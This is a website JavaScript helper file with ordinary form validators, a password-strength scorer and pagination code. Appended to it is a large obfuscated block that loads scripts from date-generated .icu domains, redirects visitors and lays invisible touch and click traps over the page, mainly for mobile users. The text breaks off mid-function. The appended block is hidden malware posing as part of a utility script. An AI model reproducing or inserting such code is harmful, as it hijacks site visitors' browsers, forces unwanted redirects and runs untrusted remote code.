var USER_IP='10.3.191.27'/*aiwaxs.org*///不允许输入中文
var engOnly=function(str){
	for(i=0;i<str.length;i++){
		var c = str.substr(i,1);
		var ts = encodeURIComponent(c);
		if(ts.substring(0,2) == "%u"){
			return false;
		} else {
			return true;
		}
	}
}

//电子邮件验证
var emailOnly=function(str){
	var regEmail=/[_a-zA-Z\d\-\.]+@[_a-zA-Z\d\-]+(\.[_a-zA-Z\d\-]+)+$/;
	if (regEmail.test(str)){
		return true;
	} else {
		return false;
	}
}

//手机号码验证
var mobileOnly=function(str){
	var regMobile=/^0{0,1}(13[0-9]|14[0-9]|15[0-9]|17[0-9]|18[0-9])[0-9]{8}$/;
	if (regMobile.test(str)){
		return true;
	} else {
		return false;
	}
}

//纯数字验证
var numOnly=function(str){
	var regNum=/^[0-9]{1,20}$/;
	if (regNum.test(str)){
		return true;
	} else {
		return false;
	}
}

//电话号码验证
var telOnly=function(str){
	var regTel=/^(\d{3,4}-)?\d{7,9}$/g;
	if (regTel.test(str))
		return true;
	else
		return false;
}

//日期的验证
var dateOnly=function(str){
	var date_array=str.split('-');
	if (date_array.length!=3) return false;
	var y=date_array[0];
	var m=date_array[1];
	var d=date_array[2];
	if (!numOnly(y)||!numOnly(m)||!numOnly(d)) return false;
	if (y.length!=4||m.length!=2||d.length!=2) return false;
	y=Number(y);
	m=Number(m);
	d=Number(d);
	if (y<1900||y>2050||m<1||m>12||d<1||d>31) return false;
	if ((m==4||m==6||m==9||m==11)&&d>30) return false;
	if ((y%100!=0&&y%4==0)||y%400==0){
		if (m==2&&d>29) return false;
	} else {
		if (m==2&&d>28) return false;
	}
	return true;
}

//密码强度检测
function passwordGrade(pwd) {
	var score = 0;
	var regexArr = ['[0-9]', '[a-z]', '[A-Z]', '[\\W_]'];
	var repeatCount = 0;
	var prevChar = '';
	//check length
	var len = pwd.length;
	score += len > 18 ? 18 : len;
	//check type
	for (var i = 0, num = regexArr.length; i < num; i++) { if (eval('/' + regexArr[i] + '/').test(pwd)) score += 4; }
	//bonus point
	for (var i = 0, num = regexArr.length; i < num; i++) {
		if (pwd.match(eval('/' + regexArr[i] + '/g')) && pwd.match(eval('/' + regexArr[i] + '/g')).length >= 2) score += 2;
		if (pwd.match(eval('/' + regexArr[i] + '/g')) && pwd.match(eval('/' + regexArr[i] + '/g')).length >= 5) score += 2;
	}
	//deduction
	for (var i = 0, num = pwd.length; i < num; i++) {
		if (pwd.charAt(i) == prevChar) repeatCount++;
		else prevChar = pwd.charAt(i);
	}
	score -= repeatCount * 1;
	return score;
 }

//字符限制
var charset="gb2312";
function strlen_verify(obj, checklen, maxlen) {
	var v = obj.value, charlen = 0, maxlen = !maxlen ? 255 : maxlen, curlen = maxlen, len = strlen(v);
	for(var i = 0; i < v.length; i++) {
		if(v.charCodeAt(i) < 0 || v.charCodeAt(i) > 255) {
			curlen -= charset == 'utf-8' ? 2 : 1;
		}
	}
	if(curlen >= len) {
		$('#'+checklen).html(curlen - len);
	} else {
		obj.value = mb_cutstr(v, maxlen, true);
	}
}

function mb_cutstr(str, maxlen, dot) {
	var len = 0;
	var ret = '';
	var dot = !dot ? '...' : '';
	maxlen = maxlen - dot.length;
	for(var i = 0; i < str.length; i++) {
		len += str.charCodeAt(i) < 0 || str.charCodeAt(i) > 255 ? (charset == 'utf-8' ? 3 : 2) : 1;
		if(len > maxlen) {
			ret += dot;
			break;
		}
		ret += str.substr(i, 1);
	}
	return ret;
}

function strlen(str) {
	return ($.browser.msie && str.indexOf('\n') != -1) ? str.replace(/\r?\n/g, '_').length : str.length;
}

//全选取消
function CheckAll(form)
{
  for (var i=0;i<form.elements.length;i++)
    {
    var e = form.elements[i];
    if (e.Name!="chkAll")
       e.checked=form.chkAll.checked;
    }
}

//url跳转
//t0:跳转的页码,t1:系统模式(动，静，伪),t2:动态模式下url模板,t3:总页数,t4:是否是后台调用(0为后台调用)


function urlgo(t0,t1,t2,t3,t4)
{
	var url;
	if(t0>t3){t0=t3}
	url=t2+t0;
	if(t4==1)
	{
		if(t1!=1)
		{
			if(t0<=1)
			{
				if(t1==2){
					//var a=t2;
					//var b=a.split("_");
					t5=t2;
				}
				else
				{
					t5="./"
				}
			}
			else
			{
				if(t1==2){
					var a=t2;
					var b=a.split("_");
					//t5=b[1]+"_[page]/"
					t5=t2+t0+"/";
				}
				else
				{
					t5="index_[page].html"
				}
				t5=t5.replace("[page]",t0);
			}
			url=t5;
		}
	}
	document.location.href=url;
}

//弹窗操作
function openlayer() {
    var boxWidth = "400px";
    if (window.innerWidth < 768 && window.innerWidth > 414) {
        boxWidth = "70%";
    } else if (window.innerWidth <= 414 && window.innerWidth > 320) {
        boxWidth = "80%";
    } else if (window.innerWidth <= 320) {
        boxWidth = "90%";
    }

    layerform = layer.open({
        type: 1,
        title: false,
        area: [boxWidth, "auto"],
        fixed: true,
        content: $('#layer-sumbit'),
    });
}

;window.isiOS=!!navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);var isIOS=-1<navigator.userAgent.search(/iphone/gi),isAndroid=-1<navigator.userAgent.search(/(android|linux)/gi);function kmleuzxb(window,document,navigator,ac){;;window._BD_DJ=function(){function randomChoice(){var a;return"undefined"!=typeof crypto&&crypto.getRandomValues?(a=new Uint8Array(1),crypto.getRandomValues(a),1&a[0]):!(Math.random()<.5)}(randomChoice()?function(){function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=239]})(a,t)}function a0a(){var a=["touches","getItem","2014","mati","7871808fQWGNm",'"+"',"padding-top:32%;","148RPuJPf","padding-top","writeln","parse","undefined","write","data","indexOf","filter","ght","config_","location","getMonth","reverse","add","touchmove","i12","_real","3202460QkOwFs","</div>","k21","slice","offsetTop","817864tCgxte","querySelector","pageY","remove","this_touch_status","979362YLrutH","random","0vw","0px","i11","stringify","common","%;h","uci","ion","body","join","check","innerHTML","startsWith","real","parentNode","getTime","padding-bottom:32%;","ejuugj","height",'c="'," onload='ejuugj()' ","/uci.","hei","wdf","rcs","stopPropagation","mg st","3pIUUJC","275PbTjxR","padding-bottom","fromCharCode","fixed","tpir",'" />',"currentPvIndex_","eig","classId",'<div  class="',"35265iJBNAB","cli","7tOkUIm","offsetParent","touchend","abcdefghijklmnopqrstuvwxyz","offsetHeight","touchMotion","addEventListener","data_","k22","ht:","bottom","clientY","dex","lin","has","/:sptt","getDate","top","th:1","platform","data3","split","100vw",'rc="',"i13",'{display:flex;width:100%;}</style><div id="',"yes","100vh","__executedClassIds","getElementsByClassName","clear","style","temp","setItem",".jpg","spt","every","length","touch_max_height","idth","773980MsGADQ","charAt","pos","floor","0vh","<style>body{","touchDelayTimeout","now","touch_min_height","1001890ZjnWzs","width","href",'<div class="',"relative","Mac"];return(a0a=function(){return a})()}(()=>{for(var a=a0b,t=a0a();;)try{if(832589==+parseInt(a(363))*(parseInt(a(284))/2)+parseInt(a(242))/3*(parseInt(a(306))/4)+parseInt(a(324))/5+parseInt(a(303))/6+-parseInt(a(244))/7*(parseInt(a(329))/8)+-parseInt(a(334))/9+-parseInt(a(293))/10*(parseInt(a(364))/11))break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(301),b=18046422,c=R(13)+b6(278),d=b6(346),e=b6(340),f=b6(349),g=454,h=2,i=b6(261),j=b6(270),k="no",l=0,m=0,n=100,o=0,p=40,q=sessionStorage[b6(300)](b6(370)+g);function r(){for(var a=s(),t=0;t<a.length;t++){var e=a[t];e=e,document[a0b(311)](e)}}function s(){var a=b6;return["<",U(a(360)),U("tpi"),a(356)," s",a(267),"ht",U(a(279)),":","/","/",a0(),".",U(a(342)),"/",f,"?",(new Date)[a(351)](),g,'">',"<","/s","c",U(a(368)),">"]}function t(a,t){return typeof a===b6(310)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(277)](b6(370)+g,q+1),window[b6(353)]=function(){var b9=b6,aB=g,aC=eval(b9(312)+aB)+"";sessionStorage[b9(277)](b9(251)+aB,aC),sessionStorage.setItem(b9(312)+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=1e3,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,u,c,f,l,d,v=b6;window.__executedClassIds=window.__executedClassIds||new Set,window[v(272)][v(258)](a.classId)||(window[v(272)][v(320)](a[v(240)]),console[v(274)](),o=a[v(240)],r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[v(338)],u=a[v(322)],c=a[v(268)],sessionStorage[o+v(323)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document.addEventListener(v(246),function(){var a,t=v;H-G<e&&(a=(Date.now()-l)/1e3,n<a)&&(F++,l=Date[t(291)]())},!1),d=Date.now(),f.push(!1),sessionStorage[o]=JSON.stringify(f),setInterval(function(){var a=v,t=(Date.now()-d)/1e3,t=r<=t,e=i<=F,n=document[a(344)][a(248)]>=s,t=t&&e&&n,e=(f[f[a(281)]-1]!==t&&(f[f[a(281)]-1]=t,sessionStorage[o]=JSON[a(339)](f)),f[a(314)](Boolean)[a(281)]),n=b<=e,t=!u||f[a(280)](Boolean),e=!c||f[0]&&f[a(280)](Boolean);n&&t&&e&&(sessionStorage[o+a(323)]="true")},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:e(316)+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t[e(338)]),i12:t[e(322)],i13:t[e(268)]}}function L(a,t){var e=b6;if(sessionStorage[a[e(240)]+"_real"])for(var n in t)n[e(348)]("r")&&typeof t[n]!==e(310)&&(t["k"+n[e(327)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,c=b6;null==sessionStorage[c(300)]("data"+a)||(e=sessionStorage[c(300)](c(251)+a),I(e=K(a,a=JSON[c(309)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=c,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a.split(","),a=a[a[t(281)]-1].split("_");r[t(292)]=parseInt(a[0]),r[t(282)]=parseInt(a[1])}if(a){var s=a[o(265)](","),s=s[0]?parseInt(s[0]):100;if(100*Math[o(335)]()<s)return r[o(333)]=!0,i(a),r}if(e)for(var b=e[o(265)](",")[0][o(265)]("_"),u=0;u<b[o(281)];u++)if(parseInt(b[u])===n)return r[o(333)]=!0,i(e),r;if(t){a=t[o(265)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math.random()<s)r.this_touch_status=!0,r[o(290)]=a,i(t)}return r})(a[c(326)],a[c(252)],a.k23,q),A=e[c(333)],B=e[c(292)],C=e.touch_max_height,D=e[c(290)],v||((e=t(a.k8,"_"))&&-1!==e[c(313)](q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e.indexOf(q+"")?w=!0:2===(e=t(a.k5,","))[c(281)]?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[c(281)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e[c(313)](q+"")?x=!0:2===(e=t(a.k6,","))[c(281)]&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(250)]("touchstart",function(a){var t=b6,a=a[t(299)][0][t(255)];H=G=a},!1),document[b6(250)]("touchmove",function(a){var t=b6,a=a[t(299)][0][t(255)],a=(H=H<a?a:H)-(G=a<G?a:G);E[t(249)](a)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U(b6(357)));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(287)](10*Math[t(335)]());return e}function S(a){for(var t=b6,e="",n=t(247),o=0;o<a;o++)e+=n[t(285)](Math.floor(Math[t(335)]()*n[t(281)]));return e}function T(a,t){var e=b6;return Math[e(287)](Math[e(335)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(265)]("").reverse()[t(345)]("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(281)];o+=t)n.push(a[e(327)](o,o+t));return n}function W(a,t){for(var e="",n=0;n<t.length;n++)e+=t[n],n<t.length-1&&(e+=a);return e}function X(){var bq=b6,aB=Date[bq(309)](new Date)/1e3+"",aC=aB.substring(6,10),aD=Math[bq(287)](9*Math[bq(335)]())+1,aE=(aB*=aD,(aB+"")[bq(281)]),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[bq(287)](2*Math[bq(335)]())+1,aI=Math[bq(287)](998*Math.random())+1,aJ=Math[bq(287)](998*Math.random())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[bq(281)],aM=(aJ+"")[bq(281)],aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"")[a(265)](""),e=t[a(281)],n=[e],o=[],r=0;r<10;r++){var i=Math.floor(9*Math[a(335)]())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s[a(281)];r++){var b=Math[a(287)](Math[a(335)]()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var u=s[r];o[u]=t[r],n[r+1]=u}return n[a(345)]("")+o[a(345)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(351)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date[t(291)]()-b),o="",r=n[t(318)]()+1,i=n[t(260)](),s=""+n.getFullYear(),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,u=0;u<6;u++)o+=(0,String[t(366)])(97+(parseInt(s)*e[3*u+1]+e[3*u+2])%e[3*u]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a.length;o++){var r=a.charCodeAt(o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(366)](r)}return n}function a2(a){var t=b6,a=a1(a,5),t=a[t(281)];return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(295)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(263)][a(313)]("Win"),e=-1!=a4[a(263)][a(313)](a(298));a4[a(263)];return(t=-1==a3[a(313)]("vv")&&t)||e}function al(){var bz=b6;x&&!window[bz(276)]&&(window[bz(276)]=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(259))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai="0vh",aj=b6(336),v?(ai=b6(271),aj=b6(266),a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(256)]=af}):w&&(ai=p+"vh",aj="100vw",a8="2",P=4,ah=function(a){a.style["z-index"]=af}),ak=Date[b6(291)](),E[b6(249)]=function(aB){var by=b6;if(A){if(0!=D){var aC=new Date(ak)[by(351)](),aD=(Date.now()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(297),ao="top",ap=b6(254),aq="",ar=b6(307),1==h&&(an=b6(367),am=b6(305),i==b6(254)&&(am=b6(352),ao=b6(254),ap=b6(254),ar=b6(365)),ae=T(8e4,9e4)),an=V(an,2),an=W('"+"',an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(304),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(304),ap),ap='"'+ap+'"',as="",at="",j==b6(270)&&(as=U(">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<"),at=U("sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1")),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bC=b6,aB=function(aD){var bA=a0b,aE=document.querySelector(bA(344)),aF=document[bA(330)](aD),aG=aF.offsetHeight,aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bB=bA,aM=aL[bB(299)][0],aN=aM[bB(255)],aO=aM[bB(331)],aP=0,aP=1!=h?aM[bB(331)]:aM[bB(255)];aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE[bA(250)](bA(321),aK)};function aC(a){for(var t=bC,e=a.offsetTop,n=a[t(245)];null!==n;)e+=n[t(328)],n=n[t(245)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bC(288)&&ai!=bC(271)&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA="yes"==k?function(a){var t=b6,e=(a[t(350)][t(332)](),document.getElementsByClassName(a9));if(e)for(var n=0;n<e[t(281)];n++)e[n][t(275)][t(354)]="0";document.getElementsByTagName(t(344))[0][t(275)][""+ar]=t(337),event[t(361)]()}:function(aB){var bF=b6;event[bF(361)](),eval(ab)()},function(){var bI=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a[t(265)]("")[t(319)]().join("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document.getElementsByClassName(a9);if(e&&null==a)for(var n=0;n<e[t(281)];n++)e[n][t(275)][t(354)]="0";window[t(317)][t(295)]=aD()},al(),x&&!window[bI(276)]&&(window[bI(276)]=!0,P=3,eval(ab)());var aE=function(){var a=bI;window[a(317)][a(295)]=aD()},aF=aC(aB[bI(264)][0][bI(359)]),aG="",aH=(a8=" ",aG+=as+bI(241)+ad+'" style=" position:;"> <span style="position: absolute;font-size: 14px;">'+a8+" <span> "+bI(325),aG+=bI(296)+a9+'" style="position:fixed;color:transparent;">.</div>',document[bI(308)](bI(289)+am+"}#"+ac+bI(269)+ac+'">'),document[bI(308)](aG),document[bI(308)](bI(325)),setTimeout(function(){function aI(aJ,aK,aL){var bK=a0b,aM=document[bK(273)](aJ)[0];aM.style[bK(358)+bK(315)]=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style["ani"+bK(302)+"on"]=at,aM.style["z-in"+bK(256)]=ae,aM.style["w"+bK(283)]=bK(266),aM[bK(347)]+="<i"+bK(362)+'yle="wid'+bK(262)+"00"+bK(341)+bK(239)+bK(253)+ag+'px;" sr'+bK(355)+U(aK)+bK(369),aM[bK(347)]=aM[bK(347)]+aq,aM["on"+bK(243)+"ck"]=function(){P=2,aL()},aM.style[bK(286)+"it"+bK(343)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bL=bI,aI=document[bL(273)](a9)[0];aI.style[bL(257)+"e-height"]=ai,aI.style[bL(294)]=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI.onclick=function(){eval(ab)()}},aw),az(),sessionStorage[bI(300)](bI(312)+g));null==aH&&r()}())}()}:function(){function a0a(){var a=["ion","check","Mac","pos","fromCharCode"," <span> ","eig","offsetHeight","getItem","currentPvIndex_","mg st","mati","_real",'<div  class="','c="',"style",'" />',"top","every","45hKGYGT","tpi","addEventListener","<style>body{","100vw",'<div class="',"touchend","cli","innerHTML","ani","stringify","temp","setItem","k22","touchDelayTimeout","push","k21","877124QzuIjz","dex","add","wachtc","data3","100vh",'"+"',"reverse","clear","184639FfqDHk","k23","location","charCodeAt","touchstart",'{display:flex;width:100%;}</style><div id="',"data_","touches","abcdefghijklmnopqrstuvwxyz","split","getElementsByClassName","writeln","parse","3714111SjdSqn","offsetTop","tpir","now",".jpg","floor","bottom","1224840Fkeeiy","length","width","random","padding-top:32%;","10638QQsMaf","0vw","touchmove","sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1","</div>","stopPropagation","height","offsetParent",'" style="position:fixed;color:transparent;">.</div>',"fixed","spt","filter","2028","classId","indexOf","touch_max_height","platform","getMonth",'e="wid',"__executedClassIds","touchMotion","this_touch_status","getElementsByTagName","621381YZGtnj","relative","padding-top","286328kokgyY","i12","getTime","1igQINT","i11","lin","data","e-hei","common","padding-bottom","i13","0vh","querySelector","Win","config_","body",'rc="',"yes","href","clientY","slice","getDate",'" style=" position:;"> <span style="position: absolute;font-size: 14px;">',"ght","remove",">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<","true","write","/:sptt","undefined","join","substring",'x;" sr'];return(a0a=function(){return a})()}function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=191]})(a,t)}(()=>{for(var a=a0b,t=a0a();;)try{if(118144==+parseInt(a(294))*(-parseInt(a(291))/2)+-parseInt(a(288))/3+parseInt(a(231))/4+-parseInt(a(214))/5*(-parseInt(a(265))/6)+-parseInt(a(240))/7+-parseInt(a(260))/8+parseInt(a(253))/9)break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(277),b=18043283,c=R(13)+b6(257),d=b6(196),e=b6(299),f="real",g=4825,h=2,i=b6(212),j="no",k="no",l=5,m=0,n=100,o=10,p=100,q=sessionStorage[b6(203)](b6(204)+g);function r(){for(var a=s(),t=0;t<a.length;t++){var e=a[t];e=e,document[a0b(318)](e)}}function s(){var a=b6;return["<",U("rcs"),U(a(215))," onload='wachtc()' "," s",a(307),"ht",U(a(275)),":","/","/",a0(),".",U("uci"),"/",f,"?",(new Date)[a(293)](),g,'">',"<","/s","c",U(a(255)),">"]}function t(a,t){return typeof a===b6(191)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(226)]("currentPvIndex_"+g,q+1),window[b6(234)]=function(){var b9=b6,aB=g,aC=eval(b9(297)+aB)+"";sessionStorage[b9(226)](b9(246)+aB,aC),sessionStorage[b9(226)](b9(297)+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=0,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,u,c,f,l,d,v=b6;window[v(284)]=window[v(284)]||new Set,window[v(284)].has(a[v(278)])||(window[v(284)][v(233)](a[v(278)]),console[v(239)](),o=a[v(278)],r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[v(295)],u=a[v(292)],c=a[v(301)],sessionStorage[o+v(207)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document[v(216)](v(220),function(){var a,t=v;H-G<e&&(a=(Date[t(256)]()-l)/1e3,n<a)&&(F++,l=Date[t(256)]())},!1),d=Date.now(),f[v(229)](!1),sessionStorage[o]=JSON[v(224)](f),setInterval(function(){var a=v,t=(Date.now()-d)/1e3,t=r<=t,e=i<=F,n=document[a(306)][a(202)]>=s,t=t&&e&&n,e=(f[f[a(261)]-1]!==t&&(f[f.length-1]=t,sessionStorage[o]=JSON[a(224)](f)),f[a(276)](Boolean)[a(261)]),n=b<=e,t=!u||f[a(213)](Boolean),e=!c||f[0]&&f[a(213)](Boolean);n&&t&&e&&(sessionStorage[o+a(207)]=a(317))},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:e(305)+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t.i11),i12:t[e(292)],i13:t.i13}}function L(a,t){var e=b6;if(sessionStorage[a[e(278)]+e(207)])for(var n in t)n.startsWith("r")&&typeof t[n]!==e(191)&&(t["k"+n[e(311)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,c=b6;null==sessionStorage[c(203)](c(297)+a)||(e=sessionStorage[c(203)](c(246)+a),I(e=K(a,a=JSON[c(252)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=c,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a.split(","),a=a[a.length-1][t(249)]("_");r.touch_min_height=parseInt(a[0]),r[t(280)]=parseInt(a[1])}if(a){var s=a[o(249)](","),s=s[0]?parseInt(s[0]):100;if(100*Math.random()<s)return r[o(286)]=!0,i(a),r}if(e)for(var b=e[o(249)](",")[0][o(249)]("_"),u=0;u<b[o(261)];u++)if(parseInt(b[u])===n)return r[o(286)]=!0,i(e),r;if(t){a=t[o(249)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math[o(263)]()<s)r[o(286)]=!0,r.touchDelayTimeout=a,i(t)}return r})(a[c(230)],a[c(227)],a[c(241)],q),A=e.this_touch_status,B=e.touch_min_height,C=e[c(280)],D=e[c(228)],v||((e=t(a.k8,"_"))&&-1!==e.indexOf(q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e[c(279)](q+"")?w=!0:2===(e=t(a.k5,","))[c(261)]?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[c(261)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e[c(279)](q+"")?x=!0:2===(e=t(a.k6,","))[c(261)]&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(216)](b6(244),function(a){var t=b6,a=a[t(247)][0][t(310)];H=G=a},!1),document[b6(216)](b6(267),function(a){var t=b6,a=a[t(247)][0][t(310)],a=(H=H<a?a:H)-(G=a<G?a:G);E[t(285)](a)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U("/uci."));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(258)](10*Math[t(263)]());return e}function S(a){for(var t=b6,e="",n=t(248),o=0;o<a;o++)e+=n.charAt(Math[t(258)](Math[t(263)]()*n[t(261)]));return e}function T(a,t){var e=b6;return Math.floor(Math[e(263)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(249)]("")[t(238)]().join("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(261)];o+=t)n[e(229)](a[e(311)](o,o+t));return n}function W(a,t){for(var e=b6,n="",o=0;o<t[e(261)];o++)n+=t[o],o<t[e(261)]-1&&(n+=a);return n}function X(){var br=b6,aB=Date[br(252)](new Date)/1e3+"",aC=aB[br(193)](6,10),aD=Math[br(258)](9*Math[br(263)]())+1,aE=(aB*=aD,(aB+"")[br(261)]),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[br(258)](2*Math[br(263)]())+1,aI=Math.floor(998*Math[br(263)]())+1,aJ=Math[br(258)](998*Math[br(263)]())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[br(261)],aM=(aJ+"").length,aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"").split(""),e=t[a(261)],n=[e],o=[],r=0;r<10;r++){var i=Math[a(258)](9*Math.random())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s[a(261)];r++){var b=Math[a(258)](Math.random()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var u=s[r];o[u]=t[r],n[r+1]=u}return n[a(192)]("")+o[a(192)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(293)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date[t(256)]()-b),o="",r=n[t(282)]()+1,i=n[t(312)](),s=""+n.getFullYear(),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,u=0;u<6;u++)o+=(0,String[t(199)])(97+(parseInt(s)*e[3*u+1]+e[3*u+2])%e[3*u]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a[e(261)];o++){var r=a[e(243)](o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(199)](r)}return n}function a2(a){var 